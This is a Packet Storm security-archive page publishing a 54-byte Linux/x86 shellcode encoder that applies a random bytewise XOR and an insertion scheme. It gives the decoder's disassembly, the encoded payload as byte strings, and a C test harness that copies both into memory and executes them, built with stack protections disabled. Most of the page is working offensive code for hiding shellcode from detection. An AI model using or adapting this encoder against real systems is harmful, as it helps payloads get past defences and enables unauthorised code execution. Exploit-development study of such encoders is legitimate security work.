exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Linux/x86 Random Bytewise XOR + Insertion Encoder Shellcode

Linux/x86 Random Bytewise XOR + Insertion Encoder Shellcode
Posted Sep 14, 2018
Authored by Ray Doyle

54 bytes small Linux/x86 random bytewise XOR + insertion encoder shellcode.

tags | x86, shellcode
systems | linux
SHA-256 | ec567bfb02611de5cb98ea0021907839dcd0276efd68fa397500ea665a4d0b67

Linux/x86 Random Bytewise XOR + Insertion Encoder Shellcode

Change Mirror Download
/* 
# Title: Linux/x86 - Random Bytewise XOR + Insertion Encoder Shellcode (54 bytes)
# Date: 2018-09-13
# Author: Ray Doyle (@doylersec)
# Homepage: https://www.doyler.net
# Tested on: Linux/x86
# gcc -o xor_encoded_shellcode -z execstack -fno-stack-protector xor_encoded_shellcode.c
*/

/****************************************************
Disassembly of section .text:

08048060 <_start>:
8048060: eb 2f jmp 8048091 <find_address>

08048062 <decoder>:
8048062: 5f pop edi
8048063: 57 push edi
8048064: 5e pop esi

08048065 <get_key>:
8048065: 8a 07 mov al,BYTE PTR [edi]
8048067: 6a 90 push 0xffffff90
8048069: 5b pop ebx
804806a: 3c aa cmp al,0xaa
804806c: 74 0a je 8048078 <decode_insertion>
804806e: 30 d8 xor al,bl

08048070 <decode_xor>:
8048070: 30 07 xor BYTE PTR [edi],al
8048072: 47 inc edi
8048073: 30 07 xor BYTE PTR [edi],al
8048075: 47 inc edi
8048076: eb ed jmp 8048065 <get_key>

08048078 <decode_insertion>:
8048078: 8d 3e lea edi,[esi]
804807a: 31 c0 xor eax,eax
804807c: 31 db xor ebx,ebx

0804807e <insertion_decoder>:
804807e: 8a 1c 06 mov bl,BYTE PTR [esi+eax*1]
8048081: 80 f3 90 xor bl,0x90
8048084: 75 10 jne 8048096 <encoded>
8048086: 8a 5c 06 01 mov bl,BYTE PTR [esi+eax*1+0x1]
804808a: 88 1f mov BYTE PTR [edi],bl
804808c: 47 inc edi
804808d: 04 02 add al,0x2
804808f: eb ed jmp 804807e <insertion_decoder>

08048091 <find_address>:
8048091: e8 cc ff ff ff call 8048062 <decoder>

08048096 <encoded>:
8048096: b7 cc mov bh,0xcc
8048098: 3d ba 0a ab f3 cmp eax,0xf3ab0aba
804809d: a3 9b bb 01 95 mov ds:0x9501bb9b,eax
80480a2: 75 d4 jne 8048078 <decode_insertion>
80480a4: bc f7 fa d9 1c mov esp,0x1cd9faf7
80480a9: 8d (bad)
80480aa: d5 1c aad 0x1c
80480ac: f7 56 73 not DWORD PTR [esi+0x73]
80480af: 31 ef xor edi,ebp
80480b1: cd a9 int 0xa9
80480b3: 34 12 xor al,0x12
80480b5: 4f dec edi
80480b6: 50 push eax
80480b7: 40 inc eax
80480b8: 71 d0 jno 804808a <insertion_decoder+0xc>
80480ba: 94 xchg esp,eax
80480bb: c4 (bad)
80480bc: f7 d7 not edi
80480be: 7f ee jg 80480ae <encoded+0x18>
80480c0: 62 (bad)
80480c1: c3 ret
80480c2: 48 dec eax
80480c3: 03 d3 add edx,ebx
80480c5: 8e 76 66 mov ?,WORD PTR [esi+0x66]
80480c8: 2c 54 sub al,0x54
80480ca: 0c 78 or al,0x78
80480cc: 05 6a 37 58 e4 add eax,0xe458376a
80480d1: 8b dc mov ebx,esp
80480d3: 04 3b add al,0x3b
80480d5: ce into
80480d6: b6 4a mov dh,0x4a
80480d8: af scas eax,DWORD PTR es:[edi]
80480d9: 53 push ebx
80480da: 59 pop ecx
80480db: a6 cmps BYTE PTR ds:[esi],BYTE PTR es:[edi]
80480dc: b5 05 mov ch,0x5
80480de: f7 30 div DWORD PTR [eax]
80480e0: 15 ea eb 09 9c adc eax,0x9c09ebea
80480e5: 60 pusha
80480e6: e4 10 in al,0x10
80480e8: 7d cc jge 80480b6 <encoded+0x20>
80480ea: 56 push esi
80480eb: cc int3
80480ec: aa stos BYTE PTR es:[edi],al
****************************************************/

#include<stdlib.h>
#include<stdio.h>
#include<string.h>

unsigned char stub[] = \
"\xeb\x31\x5f\x57\x5e\x8a\x07\x6a\x90\x5b\x3c\xaa\x74\x0a\x30\xd8\x30\x07\x47\x30\x07\x47\xeb\xed\x8d\x3e\x31\xc0\x31\xdb\x8a\x1c\x06\x80\xf3\x90\x75\x12\x8a\x5c\x06\x01\x88\x1f\x47\x04\x02\xeb\xed\xff\xe6\xe8\xca\xff\xff\xff";

unsigned char shellcode[] = \
"\xb7\xcc\x3d\xba\x0a\xab\xf3\xa3\x9b\xbb\x01\x95\x75\xd4\xbc\xf7\xfa\xd9\x1c\x8d\xd5\x1c\xf7\x56\x73\x31\xef\xcd\xa9\x34\x12\x4f\x50\x40\x71\xd0\x94\xc4\xf7\xd7\x7f\xee\x62\xc3\x48\x03\xd3\x8e\x76\x66\x2c\x54\x0c\x78\x05\x6a\x37\x58\xe4\x8b\xdc\x04\x3b\xce\xb6\x4a\xaf\x53\x59\xa6\xb5\x05\xf7\x30\x15\xea\xeb\x09\x9c\x60\xe4\x10\x7d\xcc\x56\xcc\xaa";

unsigned char* code;

main()
{
printf("\nStub Length: %d\n", strlen(stub));
printf("Shellcode Length: %d\n\n", strlen(shellcode));

printf("Total Length: %d\n\n", strlen(stub) + strlen(shellcode));

code = malloc(strlen(stub) + strlen(shellcode));
memcpy(code, stub, strlen(stub));
memcpy(&code[strlen(stub)], shellcode, strlen(shellcode));

int (*ret)() = (int(*)())code;

ret();
}

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    69 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close